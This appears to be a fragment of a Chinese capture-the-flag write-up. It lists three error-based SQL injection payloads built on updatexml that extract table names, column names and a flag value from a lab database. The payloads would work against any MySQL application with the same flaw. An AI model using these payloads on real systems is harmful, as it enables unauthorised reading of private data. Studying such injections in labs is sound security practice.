获取表名 :’ or updatexml(1,concat(‘!’,(select table_name from information_schema.tables where table_schema=‘head_error’ limit 0,1)),1),1) – qwe
得到表名:flag_head
查询字段名 : ’ or updatexml(1,concat(‘!’,(select column_name from information_schema.columns where table_name=‘flag_head’ limit 0,1)),1),1) – qwe
得到两个字段名:Id flag_h1
查询表中数据 : ’ or updatexml(1,concat(‘!’,(select flag_h1 from flag_head limit 0,1)),1),1) — qwe